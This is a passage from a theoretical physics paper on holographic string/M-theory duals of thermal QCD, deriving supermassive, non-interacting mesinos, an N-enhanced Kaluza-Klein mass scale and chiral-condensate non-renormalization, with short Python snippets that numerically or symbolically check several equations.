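# along the thermal circle, for a few mode numbers n and arbitrary sample values of T, t.
import cmath

T, t = 0.3, 1.7  # arbitrary sample values, not taken from the paper
for n in range(4):
    T_n = lambda s, n=n: cmath.exp(1j * (2 * n + 1) * cmath.pi * T * s)
    print(n, abs(T_n(t + 1 / T) + T_n(t)))  # ~1e-16, i.e. T_n(t + 1/T) = -T_n(t)
```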
Defining \(u\equiv\sqrt{r-r_{0}}\), the EOM for \(R_{n,2}(r)\) for the TH type IIA background with \(\Gamma^{\underline{1}\underline{5}}\Theta_{2,0}=\Theta_{2,0},\ \Gamma^{ \underline{1}\underline{2}}\Theta_{2,0}=\Theta_{2,0}\), can be recast into a Schrodinger-like equation (where, \(a_{1},b_{1},\mathcal{A}_{\Theta_{2}},\mathcal{B}_{\Theta_{2}},\mathcal{A}_{ \Theta_{2}^{\prime}},\mathcal{B}_{\Theta_{2}^{\prime}}\) are defined in (B5)): \[\chi_{2,n}^{\prime\prime}(u)+V(u)\chi_{2,n}(u)=0, \tag{28}\] where, \[V(u)=-\frac{3}{4u^{2}}+\frac{\mathcal{A}_{\Theta_{2}^{\prime}}}{a_{1}u}-\frac {\mathcal{A}_{\Theta_{2}^{\prime}}}{a_{1}^{2}}+\mathcal{O}(u), \tag{29}\] and, \[R_{2,n}(u)=\sqrt{u}\left(a_{1}+b_{1}u^{2}\right)^{-\frac{\mathcal{B}_{\Theta_{ 2}^{\prime}}}{2b_{1}}}e^{-\frac{\mathcal{A}_{\Theta_{2}^{\prime}}\tan^{-1} \left(\frac{\sqrt{b_{1}}}{\sqrt{a_{1}}}\right)}{\sqrt{a_{1}}\sqrt{a_{1}}}}\chi _{2,n}(u). \tag{30}\] The solution of (28) is given by: \[\chi_{2,n}(u)=c_{1,n}M_{\frac{1}{2},1}\left(\frac{2\mathcal{A}_{\Theta_{2}^{ \prime}}u}{a_{1}}\right)+c_{2,n}W_{\frac{1}{2},1}\left(\frac{2\mathcal{A}_{ \Theta_{2}^{\prime}}u}{a_{1}}\right). \tag{31}\] One, therefore obtains: \[R_{2,n}(r\sim r_{0})=\frac{c_{2,n}a_{1}^{\frac{1}{2}-\frac{8_{ \Theta_{2}^{\prime}}}{2b_{1}}}}{\sqrt{2}\sqrt{\mathcal{A}_{\Theta_{2}^{\prime }}}}-\frac{(r-r_{0})a_{1}^{-\frac{\mathcal{B}_{\Theta_{2}^{\prime}}}{2b_{1}}} -\frac{3}{2}\left(a_{1}\mathcal{B}_{\Theta_{2}^{\prime}}c_{2,n}+\mathcal{A}_{ \Theta_{2}^{\prime}}^{2}(4c_{2,n}-8c_{1,n})\right)}{2\sqrt{2}\sqrt{\mathcal{A }_{\Theta_{2}^{\prime}}}}+\mathcal{O}\left((r-r_{0})^{3/2}\right).\] From (B5), one sees the absence of \(\mathcal{O}(R^{4})\) corrections in (32). One also sees from (32) that one can impose Dirichlet boundary condition at \(r=r_{0}\) (thereby setting \(c_{2}=0\)) for all and hence superheavy mesinos (\(M_{\rm Mesino}\)). For the BH background assuming \(\Gamma^{\underline{1}\underline{5}}\Theta_{2,0}=\Theta_{2,0},\ \Gamma^{ \underline{1}\underline{2}}\Theta_{2,0}=\Theta_{2,0}\), implying, \(\Gamma^{\underline{2}\underline{5}}\Theta_{2,0}=\Theta_{2,0}\), in the IR (i.e., near \(r=r_{h}\)), redefining \(u\equiv\sqrt{r-r_{h}}\), the solution of the EOM for \(R_{2,n}(u)\) is: \[R_{2,n}(u)=u^{\Lambda}\left[c_{1}U\left(\mu_{1},\mu_{2},\mu_{3}u\right)+c_{2}L _{-\mu_{1}}^{\mu_{2}-1}\left(\mu_{3}u\right)\right], \tag{33}\] where \(\Lambda,\mu_{1,2,3}\) are defined in (D1), and \(p=M_{\rm Mesino}\frac{r_{h}}{\sqrt{g_{s}N}}\)4 is contained in the \(\mathcal{O}\left(\frac{\beta}{N}\right)\) term in \(\mu_{3}\), which hence remains undetermined as \(\mathcal{O}\left(\frac{\beta}{N}\right)\) terms are dropped (see footnote **1**). One can show that \(\lim_{u\to 0}u^{\Lambda}c_{1}U\left(\mu_{1},\mu_{2},\mu_{3}u\right)\) is singular. One hence can not impose Dirichlet or Neumann boundary condition at \(r=r_{h}\) if \(c_{2}=0\). Now, Footnote 4: Glueball and meson masses at high temperatures were obtained respectively in [22] and [19] in units of \(\frac{r_{h}}{\sqrt{g_{s}N}}\). \[L_{-\mu_{1}}^{\mu_{2}-1}(u)=\frac{\Gamma(\mu_{2}-\mu_{1})}{\Gamma(1-\mu_{1}) \Gamma(\mu_{2})}-\frac{\Gamma(\mu_{2}-\mu_{1})}{\Gamma(-\mu_{1})\Gamma(\mu_{2 }+1)}u+\mathcal{O}(u^{2}), \tag{34}\] implying \(\lim_{u\to 0}u^{\Lambda}c_{2}L^{\mu_{2}-1}_{-\mu_{1}}(\mu_{3}u)=0\), implying the Dirichlet boundary condition is identically satisfied \(\forall M_{\rm Mesino}\) including very large \(M_{\rm Mesino}\). 
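The Whittaker-function form (31) of the thermal-background solution can be spot-checked numerically. The sketch below is ours; the values of \(a_{1}\) and \({\cal A}_{\Theta_{2}^{\prime}}\) are placeholders rather than the expressions of (B5), and the \({\cal O}(u)\) tail of (29) is dropped. It verifies that \(\chi=M_{\frac{1}{2},1}\left(\frac{2{\cal A}_{\Theta_{2}^{\prime}}u}{a_{1}}\right)+W_{\frac{1}{2},1}\left(\frac{2{\cal A}_{\Theta_{2}^{\prime}}u}{a_{1}}\right)\) solves \(\chi^{\prime\prime}(u)+V(u)\chi(u)=0\):

```python
# Numerical spot-check (illustrative only) that the Whittaker combination (31) solves
# chi'' + V chi = 0 with V(u) = -3/(4u^2) + A/(a1*u) - A^2/a1^2, cf. (28)-(29).
# a1 and A below are placeholder numbers, not the expressions of appendix B.
import mpmath as mp

mp.mp.dps = 30
a1, A = mp.mpf("0.7"), mp.mpf("1.3")

def V(u):
    return -3 / (4 * u**2) + A / (a1 * u) - A**2 / a1**2

def chi(u):
    z = 2 * A * u / a1
    return mp.whitm(mp.mpf("0.5"), 1, z) + mp.whitw(mp.mpf("0.5"), 1, z)  # c1 = c2 = 1

for u in (mp.mpf("0.3"), mp.mpf("1.1"), mp.mpf("2.4")):
    # residual of the Schrodinger-like equation; ~0 up to numerical-differentiation error
    print(u, mp.diff(chi, u, 2) + V(u) * chi(u))
```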
It is extremely non-trivial that the \(\mu_{i}\)'s receive no \({\cal O}(\beta)\) corrections up to \({\cal O}\left(\frac{\beta}{N^{\alpha_{\mu_{i}}}}\right),\ \alpha_{\mu_{i}}\geq 1\) - see (D1). The absence of \({\cal O}(R^{4})\) corrections is essentially a reflection of the fact that the \(SL(2,Z)\) completion of the effective \(R^{4}\) interaction terms in type IIB supergravity leads to an interesting non-renormalization theorem that forbids perturbative corrections beyond one loop in the zero-instanton sector [21]. What we now address in section 4 is how an \(N\)-enhancement (\(\equiv N\)-hancement) of the mass scale \(M_{\rm KK}=\frac{r_{0}}{\sqrt{4\pi g_{s}N}}\)[5] is obtained, which therefore explains how one could obtain supermassive \(M_{\rm Mesino}\). ## 4 Generation of \(N\)-hanced Mass Scale for \(T<T_{c}\) In this section, starting from the \(D=11\) supergravity Einstein's field equations in the presence of four-form \(G\) fluxes of \({\cal M}\)-theory 5 - the first in (8) (also given in E) - we explicitly show the generation of an \(N\)-enhanced (\(\equiv\) "\(N\)-hanced") mass scale, thereby providing the mechanism of generation of supermassive mesinos. Footnote 5: One can show that “\(E_{\rm s}\)”-dependent terms in the same are subdominant as compared to the “\(J_{0}\)”-dependent terms [3]. Replacing the resolution parameter "\(a\)" of the blown-up \(S^{2}\) by \(a(r)\), substituting an ansatz: \(a(r)=b+c^{\beta^{0}}(r-r_{0})+\beta{\cal A}^{\beta}(r)\) into EOM\({}_{MN}\) in (8) (\(b\) being a "bare" resolution parameter) and estimating \(r_{0}\sim e^{-\kappa_{r_{0}}N^{1/3}}\)[23], near the \(\psi=2n\pi,n=0,1,2\)-coordinate patch, yields the following: 1. \[{\rm EOM}_{tt,x^{1}x^{1}/x^{2}x^{2}}:\ b\sim\kappa_{tt/x^{i}x^{i}/rr}N^{10/9}e^{-\kappa_{r_{0}}(N)\left(3+0.5\kappa_{r_{0}}(N)N^{1/3}\right)N^{1/3}}r_{0};\] \[{\cal A}^{\beta}(r)\sim e^{\frac{c^{\beta}}{b}r}{\cal C}_{1},\] (35) with \(\kappa_{tt/x^{i}x^{i}/rr}\gg 1,\ \kappa_{r_{0}}(N=10^{2})=\frac{1}{{\cal O}(1)}-{\cal O}(1)\), one obtains \(b\gg r_{0}\) and in principle an \(r_{0}\)-independent true bare resolution parameter proportional to \(\beta\); EOM\({}_{x^{3}x^{3}}\) near \(r=r_{0}\) does not constrain \(b\). 2. \[{\rm EOM}_{rr}:\ b\sim\tilde{\kappa}_{rr}N^{11/9}e^{\kappa_{r_{0}}N^{1/3}+1.25\sqrt{1.57+0.55\log r_{0}-0.5\left(\log r_{0}\right)^{2}}}r_{0};\] (36) and for an appropriate \(\kappa_{r_{0}}\sim\frac{1}{{\cal O}(1)}:1.57+0.55\log r_{0}-0.5\left(\log r_{0}\right)^{2}>0\), and \(N\sim 10^{2}\), one regains the result for \(b\) as obtained in the first equation in (35).
\(\frac{1323\sqrt[3]{N}\alpha_{\theta_{1}}^{2}}{256\alpha_{\theta_{2}}^{2}}-\frac{729 {g_{s}}^{3}M^{2}\left(\frac{1}{N}\right)^{6/5}{N_{f}}^{2}\left(2187\alpha_{ \theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+50 \alpha_{\theta_{2}}^{4}\right)a(r)^{3}\log^{3}(r_{0})\left(2rr_{0}\log(r_{0})a ^{\prime}(r)+a(r)(r_{0}-r)\log(r_{0})\right)}{16\pi^{3}r_{0}\alpha_{\theta_{1} }^{2}\alpha_{\theta_{2}}^{2}}=0,\] (37) whose solution is given by: \[a(r)=\left(\frac{864c_{1}{g_{s}}^{3}M^{2}{N_{f}}^{2}\Sigma e^{ \frac{2r}{6}}\log^{4}(r_{0})-98\pi^{3}N^{7/5}{r_{r}}{r_{0}}^{5}\alpha_{\theta _{1}}^{4}-49\pi^{3}N^{7/5}{r_{0}}^{6}\alpha_{\theta_{1}}^{4}}{{g_{s}}^{3}M^{2 }{N_{f}}^{2}r^{2}\Sigma\log^{4}(r_{0})}\right)^{1/4},\] \[\sim c_{1}\frac{e^{\frac{2r_{0}}{r_{0}}}}{\sqrt{r}}\sim\frac{c_{ 1}}{\sqrt{r_{0}}}\left[1+{\cal O}\left(\frac{(r-r_{0})^{2}}{r_{0}^{2}}\right) \right], \tag{38}\] where \(\Sigma\equiv\left(2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^ {2}\alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}\right)\). Recalling that \(r_{0}\sim e^{-\kappa_{r_{0}}N^{1/3}}\), we reinterpret (37) as \(a(r\sim r_{0})\sim c_{1}e^{\frac{3\kappa r_{0}N^{1/3}}{2}}r_{0}\), where for compatibity with (35) and (36), one may choose an \(N\)-dependent \(c_{1}\sim N^{(10-11)/9}e^{-\gamma N^{1/3}}\) for an appropriate \(\gamma\). 4. EOM\({}_{\theta_{1}\theta_{2}}\) \[\lambda_{3}a(r)^{3}\left(a(r)-a^{\prime}(r)\right)+\lambda_{1}a(r)^{4}+\frac{ \lambda_{2}\left(36a(r)^{2}\log(r_{0})+r_{0}\right)}{{r_{0}}^{2}-3a(r)^{2}}=0,\] (39) where, \[\lambda_{1} \equiv-\frac{243{g_{s}}^{3}M^{2}\left(\frac{1}{N}\right)^{11/10} N_{f}^{2}\left(2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}\right)\log^{4}(r_{0})}{8 \pi^{3}{r_{0}}^{4}\alpha_{\theta_{1}}\alpha_{\theta_{2}}^{3}},\] \[\lambda_{2} \equiv-\frac{1323N^{3/10}r_{0}\alpha_{\theta_{1}}^{3}}{256\alpha _{\theta_{2}}^{3}(\log N-9\log(r_{0}))},\] \[\lambda_{3} \equiv-\frac{729{g_{s}}^{3}M^{2}\left(\frac{1}{N}\right)^{11/10} N_{f}^{2}\left(2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}\right)\log^{4}(r_{0})}{8 \pi^{3}{r_{0}}^{3}\alpha_{\theta_{1}}\alpha_{\theta_{2}}^{3}}.\] (40) Defining, \[\Lambda\equiv\frac{2^{5/6}\sqrt{g_{s}}^{3}\sqrt{M}\sqrt[3]{N_{f}}r_{0}^{2} \sqrt[6]{2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}}\log^{\frac{25}{6}}(r_{0})} {9\sqrt[3]{7}\sqrt{3\pi}N^{7/30}\alpha_{\theta_{1}}^{2/3}},\] (41) \(a(r)\) is given by: \[\sqrt{\Lambda+\exp\left(\frac{2(r+\lambda_{3}c_{1})\left(\Lambda (\lambda_{1}+\lambda_{3})\left(2{r_{0}}^{2}-9\Lambda\right)+36\lambda_{2}\log (r_{0})\right)}{\lambda_{3}\Lambda\left({r_{0}}^{2}-3\Lambda\right)}\right)}\] \[\sim\sqrt{\Lambda}\sim\frac{\sqrt[4]{3}{g_{s}}^{3}\sqrt{M}\sqrt[6]{N _{f}}\sqrt[12]{2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}}\log^{\frac{25}{12}}(r_{0})} {N^{7/60}\alpha_{\theta_{1}}^{1/3}}r_{0}.\] (42) 5. EOM\({}_{\theta_{1}x}\): \[b\sim N^{23/36}e^{\frac{1}{6}\kappa_{r_{0}}N^{1/3}\left(9\kappa_{r_{0}}N^{1/3}+ \log N\right)}r_{0}.\] (43) 6. EOM\({}_{\theta_{1}y}\): \[b\sim Ne^{\frac{3}{2}\kappa_{r_{0}}^{2}N^{2/3}}r_{0}.\] (44) 7. EOM\({}_{\theta_{2}x}\): \[b\sim\kappa_{\theta_{2}y}N^{10/9}e^{-\kappa_{r_{0}}^{2}N^{2/3}+4\kappa_{r_{0} }N^{1/3}}r_{0},\ \kappa_{\theta_{2}x}\gg 1.\] (45) 8. 
EOM\({}_{\theta_{2}y}\): \[b\sim N^{10/9}e^{-3\kappa_{r_{0}}N^{1/3}+\kappa_{r_{0}}^{2}N^{2/3}}r_{0}.\] (46) 9. EOM\({}_{\theta_{2}z}\): \[b\sim N^{10/9}e^{\kappa_{r_{0}}^{2}N^{2/3}-3\kappa_{r_{0}}N^{1/3}}r_{0}.\] (47) 10. EOM\({}_{xz/yy/yz/zz}\): \[b\sim N^{10/9}e^{\kappa_{r_{0}}^{2}N^{2/3}-6\kappa_{r_{0}}N^{1/3}}r_{0}.\] (48) 11. EOM\({}_{x^{10}x^{10}}\): \[b\sim N^{10/9}r_{0}.\] (49) We therefore see that the "bare resolution parameter" \(b\) given by: \[b\sim N^{1+\frac{1}{{\cal O}(1)}}r_{0};\quad a^{\beta}(r)={\cal C}e^{\frac{c_{ \rm linear}}{b}r},\ {\cal C}\equiv{\rm constant}. \tag{50}\] One hence can not obtain an \(r_{0}\)-independent "\(b\)". _One thus sees an \(N\)-hancement of the effective KK mass scale \(M_{KK}\) (from \(M_{KK}\) to \(M_{KK}^{\rm eff}\sim N^{1+\frac{1}{{\cal O}(1)}}M_{KK}\)) arising from the construction of SYZ type IIA mirror of the non-Kahler type IIB dual [2] of thermal QCD-like theories, as well as the generation of a one-parameter (\({\cal C}\)) family of \(r_{0}/M_{KK}\)-independent bare resolution parameter at \({\cal O}(R^{4})\) in the \({\cal M}\)-theory uplift involving a \(G_{2}\)-structure wherein \({\cal C}\) can be made appropriately large._ These are the pair of reasons for generating super-massive mesinos in the fermionic sector in the string/\({\cal M}\) theory duals of thermal QCD at finite \(N\) in [1], [3]. Non-Interacting Mesinos Given that we have seen in 3 that supermassive mesinos, unlike [8] (see [9]), _are_ permissible in the type IIA holographic dual [1] at intermediate coupling [3] of realistic thermal QCD-like theories, this already explains why mesinos have thus far not been observed near the EW scale. In this section, we will further show that mesino-mesino-single-(\(\rho/\pi\))meson interactions, unlike [8] (see [9]), vanish identically in the aforementioned type IIA holographic dual. Considering fluctuations of the vector mesons \(A_{\mu,r}\to A^{(0)}_{\mu,r}+\delta A_{\mu,r}\) with \(A^{(0)}_{\mu=t}\) being the only non-zero background value (see 3) which can be shown to be tunable so that \(|F^{(0)}_{rt}|\ll 1\), implying one need only consider terms linear in \(F^{(0)}_{\rm IIA}\)6 which are contained (recalling from section 3, \(\sqrt{-{\rm det}(i^{*}g^{\rm IIA}+{\cal F}^{(0)}_{\rm IIA})}\ll 1\), \({\cal F}_{IIA}=i^{*}B_{IIA}+F\) in the large-\(N\) limit) in : Footnote 6: Use is made of \(i^{*}B_{\alpha_{1}\alpha_{2}}=\delta^{[\theta_{1}}_{\alpha_{1}}\delta^{\theta _{2}]}_{\alpha_{2}}B_{\theta_{1}\theta_{2}}\) and consequently, \({\cal F}_{rt}=F_{rt}\). \[S^{f}_{D_{6}}=\frac{T_{D_{6}}}{2}\int d^{7}\xi e^{-\Phi^{\rm IIA}}\;\overline{ \Theta}\left(\frac{\Gamma^{\beta_{1}....\beta_{7}}{\cal F}^{(0)}_{\rm IIA}\ \beta_{6}\beta_{7}\Gamma_{\beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{ (10)}}{\sqrt{-{\rm det}(i^{*}g^{\rm IIA}+{\cal F}^{(0)}_{\rm IIA})}}\right)\Theta. \tag{51}\] Considering fluctuations in the background gauge field in (51) and retaining terms linear in the same yields: \[\delta S^{f}_{D_{6}}\sim T_{D_{6}}\int_{\Sigma_{(7)}}d^{4}xdrd\theta_{2}d \tilde{y}e^{-\Phi^{\rm IIA}}\overline{\Theta}\left(\frac{4\Gamma^{\beta_{1}.... \beta_{7}}\delta{\cal F}^{\rm IIA}_{\beta\theta\eta}\Gamma_{\beta_{1}.... \beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{\sqrt{-{\rm det}(i^{*}g^{\rm IIA }+{\cal F}^{(0)}_{\rm IIA})}}\right)\Theta. 
\tag{52}\] The next step is to perform the KK expansion of \(\delta{\cal F}^{\rm IIA}_{\alpha\beta}\) and decompose spinors along \(M_{4}\) and internal directions, and by integrating over the \(\theta_{2}\) and \(\tilde{y}\) we will get mesino-mesino-meson interaction action with couplings given in terms of radial integrals of the radial profile functions of the mesino and mesons. The usual KK expansion ansatz [5] is: \[\delta A_{\mu}(x^{\mu},r)=\sum_{n=1}^{\infty}\rho^{(n)}_{\mu}(x)\psi_{n}(r), \tag{53}\] and \[\delta A_{r}(x^{\mu},r)=\sum_{n=0}^{\infty}\pi^{(n)}(x)\phi_{n}(r), \tag{54}\] implies \[\delta F_{\mu\nu}=\sum_{n=1}^{\infty}\tilde{F}^{(n)}_{\mu\nu}(x)\psi_{n}(r), \tag{55}\] and \[\delta F_{\mu r}=\sum_{n=0}^{\infty}\partial_{\mu}\pi^{(n)}(x^{\mu})\phi_{n}( r)-\sum_{n=1}^{\infty}\rho^{(n)}_{\mu}(x)\dot{\psi}_{n}(r). \tag{56}\] We will keep the \(n=1\) term for the vector fluctuation and \(n=0\) for the \(A_{r}(x^{\mu},r)\); hence, the degrees of freedom are \(\rho\) vector meson and \(\pi\) meson. Using the KK decomposition of \(\delta F_{\mu\nu}\) and \(\delta F_{\mu r}\), (52) simplified as follows: \[S_{D_{6}}^{int} \sim T_{D_{6}}\int_{\Sigma_{(7)}}\Biggl{[}\frac{e^{-\Phi^{\rm IIA}}}{ \sqrt{-{\rm det}(i^{*}g^{\rm IIA}+{\cal F}_{\rm IIA}^{(0)})}}\overline{\Theta} \Biggl{(}\Gamma^{\beta_{1}.....\beta_{5}\mu\nu}\delta\tilde{F}_{\mu\nu}\psi(r) \Gamma_{\beta_{1}.....\beta_{5}}{}^{\gamma}D_{\gamma} \tag{57}\] \[+\Gamma^{\beta_{1}.....\beta_{5}\mu r}\left(\partial_{\mu}\pi(x^{ \mu})\phi(r)-\rho_{\mu}(x^{\mu})\dot{\psi}(r)\right)\Gamma_{\beta_{1}..... \beta_{5}}{}^{\gamma}D_{\gamma}\Biggr{)}\Theta\Biggr{]}.\] Using the decomposition of the ten-dimensional gamma matrices [24]: \[\Gamma^{\underline{A}=\underline{t},x^{1,2,3},\underline{r}}=\sigma_{y} \otimes{\bf 1}_{4}\otimes\gamma^{\underline{A}},\quad\Gamma^{\underline{a}=5, \ldots,9}=\sigma_{x}\otimes\gamma^{\underline{a}}\otimes{\bf 1}_{4}, \tag{58}\] with \[\left\{\gamma^{\underline{A}},\gamma^{\underline{B}}\right\}=-2 \eta^{\underline{AB}},\] \[\left\{\gamma^{\underline{a}},\gamma^{\underline{b}}\right\}=-2 \delta^{\underline{ab}}. \tag{59}\] The ten-dimensional chirality matrix is defined as: \[\Gamma^{(10)}=\sigma_{z}\otimes{\bf 1}_{4}\otimes{\bf 1}_{4}. \tag{60}\] The positive-chirality ten-dimensional \(\Theta\) can hence be decomposed into \[\Theta=\uparrow\otimes\chi_{M_{5}(x^{0,1,2,3},r)}\otimes\psi_{\tilde{M}_{5}( \theta_{1,2},\phi_{1,2},\psi)}, \tag{61}\] where \(\psi_{\tilde{M}_{5}(\theta_{1,2},\phi_{1,2},\psi)}\) further splits into \(\psi_{\tilde{M}_{5}}=\psi_{S_{\rm squashed}^{2}}\otimes\psi_{S_{\rm squashed}^{3}}\). Looking at the second fermionic bilinear in (57): \[\bar{\Theta}\Gamma^{\beta_{1}...\beta_{5}tr}\Gamma_{\beta_{1}...\beta_{5}}{}^ {\gamma}D_{\gamma}\Theta(\beta_{i=1,...,5}=x^{0,1,2,3},\theta_{2},\tilde{y}; \ \gamma=t,r)\sim\bar{\Theta}\Gamma^{t}D_{r}\Theta+\bar{\Theta}\Gamma^{r}D_{t}\Theta. \tag{62}\] Now, the non-vanishing \(\bar{\Theta}\Gamma^{\underline{X}_{1}...\underline{X}_{p}}\Theta\) involving Majorana-Weyl spinor \(\Theta\) requires \(p=3,7\)[9]. One can further show that the most dominant spin-connection component of the type \(\omega_{r}^{\underline{ab}}\) is \(\omega_{r}^{\overline{7}9}\) and only non-vanishing spin-connection component of the type \(\omega_{t}^{\underline{ab}}\) is \(\omega_{t}^{\underline{x}^{0}r}\). 
Therefore, using (58): \[\bar{\Theta}\Gamma^{\beta_{1}...\beta_{5}tr}\Gamma_{\beta_{1}...\beta_{5}}{}^ {\gamma}D_{\gamma}\Theta\sim\bar{\Theta}\Gamma^{\underline{t}}\omega_{r}^{ \overline{7}9}\Gamma^{\overline{7}9}\Theta\propto\langle\uparrow|\sigma_{y}| \uparrow\rangle=0. \tag{63}\] Also, \[\overline{\Theta}\Gamma^{\beta_{1}.....\beta_{5}\mu\nu}\delta\tilde{F}_{\mu \nu}\psi(r)\Gamma_{\beta_{1}.....\beta_{5}}{}^{\gamma}D_{\gamma}\Theta=0, \tag{64}\] as \(\mu,\nu\in x^{1,2,3}\) and thus using (58): \[\overline{\Theta}\Gamma^{kx^{0}r\theta_{2}\tilde{y}\tilde{y}j}\delta\tilde{F} _{ij}\psi(r)\Gamma_{kx^{0}r\theta_{2}\tilde{y}}{}^{i}D_{i}\Theta(i\neq j\neq k =x^{1,2,3})\sim\delta\tilde{F}_{ij}\overline{\Theta}\Gamma^{ij}\Gamma^{l} \partial_{l}\Theta(l\neq k)\ \propto\langle\uparrow|\sigma_{y}|\uparrow\rangle=0. \tag{65}\] Hence, no mesino-mesino-\(\rho/\pi\)-meson vertex is generated. Together with what was argued earlier that one could have a supermassive mesino, this suggests the "WISP"(Weakly Interacting Supermassive Particle)y nature of the non-supersymmetric mesino, and consequently resolves the tension between actual QCD and top-down holographic QCD [9]. Top-Down \(m_{\rm quark}\langle\bar{q}q\rangle\) Non-Renormalization up to \({\cal O}(R^{4})\) The \({\cal O}(R^{4})\) corrections to the \({\cal M}\)-theory dual's metric are vanishing small in the UV [25]. The EOM of the flavor \(D6\)-branes' embedding, \(\tilde{z}=\tilde{z}(r)\) in the IR arising from the DBI action for the flavor \(D6\)-branes with world volume \(\Sigma_{7}\left(S^{1}_{t}\times\mathbb{R}^{3}\times\mathbb{R}_{>0}\times S^{2} _{\rm squashed}\right)\) embedded via \(i:\Sigma_{7}\hookrightarrow S^{1}_{t}\times\mathbb{R}^{3}\times_{w}M_{6}\) [\(w\equiv\) warped product] effected by \(\tilde{z}=\tilde{z}(r)\) in a non-Kahler warped squashed resolved conifold \(M_{6}\) in the type IIA mirror of the UV-complete type IIB dual [2] of thermal QCD-like theories, using the induced metric on flavor \(D6\)-branes of (23), NS-NS \(B^{\rm IIA}\) of (22), can be shown to yield: \(\tilde{z}=\)constant, inclusive of \({\cal O}(\beta)\) corrections. The DBI action in the UV is given by (disregarding overall \(r\)-independent factors, and hence the \(\sim\)): \[{\cal L}^{\rm D6}_{\rm DBI}\sim\frac{r^{2}\sqrt{\frac{4\pi\sqrt{g_{s}}r^{2} \alpha_{\theta_{2}}^{3}(6a^{2}+r^{2})}{9a^{2}+r^{2}}+3\sqrt{3\pi}N^{2/5}\left(r ^{4}-{r_{h}}^{4}\right)\tilde{z}^{\prime}(r)^{2}}}{{g_{s}}^{3/4}}, \tag{66}\] and consequently the \(\tilde{z}(r)\) EOM: \(\frac{\delta{\cal L}^{\rm D6}_{\rm DBI}}{\delta\tilde{z}^{\prime}(r)}={\cal K}\) (constant) in the UV yields: \[\tilde{z}^{\prime}(r)=\frac{{\cal C}}{r^{5}}, \tag{67}\] \({\cal C}\) being a constant (subsuming \(g_{s}\)- and \(N\)-dependent factors). One hence obtains7: Footnote 7: \(\tilde{\zeta}_{2}=\frac{{\cal C}}{4}\). \[\tilde{z}(r)={\cal C}_{1}-\frac{\tilde{\cal C}_{2}}{r^{4}}\stackrel{{ r\in{\rm UV}}}{{\longrightarrow}}{\cal C}_{1}. \tag{68}\] As \(\tilde{z}(r)\) is dimensionless, \({\cal C}_{1}\) will hence also be so, and \({\cal C}_{2}\) will have a mass dimension of four (in units of \({\cal R}_{D5/\overline{D5}}=D5-\overline{D5}\)-separation). 
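As a small symbolic cross-check (ours) of the step from (67) to (68) and of footnote 7, integrating \(\tilde{z}^{\prime}(r)={\cal C}/r^{5}\) directly reproduces the \(1/r^{4}\) fall-off with \(\tilde{\cal C}_{2}={\cal C}/4\):

```python
# Symbolic check (illustrative) of (67) -> (68): integrating z'(r) = C/r^5 gives
# z(r) = C_1 - (C/4)/r^4, i.e. footnote 7's relation C2_tilde = C/4.
import sympy as sp

r, C, C1 = sp.symbols("r C C_1", positive=True)
ztilde = C1 + sp.integrate(C / r**5, r)
print(sp.simplify(ztilde))  # C_1 - C/(4*r**4)
```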
By looking at fluctuations: \(\tilde{z}\rightarrow\tilde{z}+\delta\tilde{z}\) in the DBI action (no mass term \((\delta\tilde{z})^{2}\) is generated) one can show that in the UV and in the \(\psi=2n\pi,n=0,1,2\)-coordinate patches and by working near, e.g., \((\theta_{1},\theta_{2})=\left(\frac{\alpha\theta_{1}}{N^{1/5}},\frac{\alpha \theta_{2}}{N^{3/10}}\right)\)[12], [23] (consistent with the \(\mu_{\rm Ouyang}|\ll 1\)-limit of the flavor \(D7\)-branes in the parent type IIB dual [2]): \[\delta\tilde{z}\stackrel{{{\rm UV}}}{{\longrightarrow}}c_{1}+ \frac{{\cal C}_{2}}{r^{4}}+{\cal O}\left(\left(\frac{{\cal C}_{2}}{r}\right)^{ 12}\right). \tag{69}\] Again, we see that the mass dimension of the coefficient \({\cal C}_{2}\) of \(\frac{1}{r^{4}}\) is four (and \(c_{1}\) is dimensionless). Given that one obtains an \(AdS_{5}\) in the UV, the coefficient of \(\frac{1}{r^{4}}\) for the massless fluctuation \(\delta\tilde{z}\) is identified with a chiral condensate [26], we conjecture that \({\cal C}_{2}\) is the top-down holographic analog of the mass-dimension-four \(m_{q}\langle\bar{q}q\rangle\). As the \({\cal O}(R^{4})\) corrections are vanishingly small in the UV [5], \(c_{1}\) and \({\cal C}_{2}\) receive no \({\cal O}(R^{4})\) corrections. This is the top-down holographic analog of the RG-invariance of \(m_{q}\langle\bar{q}q\rangle\)[27]. Universality in Particle Wave Functions in the IR An intriguing universality in the wave functions of the following particle spectroscopies is noticed. **Glueballs**[22]: * \(0^{-+}\) glueball: The EOM of the type IIA RR \(A\) fluctuation (to which tr\(F\wedge\tilde{F}\) couples via the type IIA \(D4\)-brane with world volume \(\Sigma_{1,4}\)) term WZ term \(\int_{\Sigma_{1,4}}A\wedge\)tr\(F\wedge\tilde{F}\)) \(\partial_{\nu}\left(\sqrt{g^{\rm IIA}}g^{\mu\sigma}_{\rm IIA}g^{\nu\rho}_{\rm IIA }\left(\partial_{[\sigma}A_{\rho]}\right)\right)=0\) (where \(\mu,\nu,...=a(\equiv 0,1,2,3),r,\alpha(\equiv 5,...,9)\) and it was assumed \(A_{\mu}=\delta^{\theta_{\mu}}_{\mu}a_{\theta_{2}}(r)e^{ik\cdot x},k^{2}=-m^{2}\) as the fluctuation about the type IIA \(A_{1}\) that was worked out in [1]). * \(0^{--}\) glueball: The EOM for the fluctuation in the type IIB \(A_{MN}=B_{MN}+iC_{MN}\) (that figures in the Weiss-Zumino term \(A^{\mu\nu}d^{abc}{\rm Tr}\left(F^{a}_{\mu\rho}F^{b\ 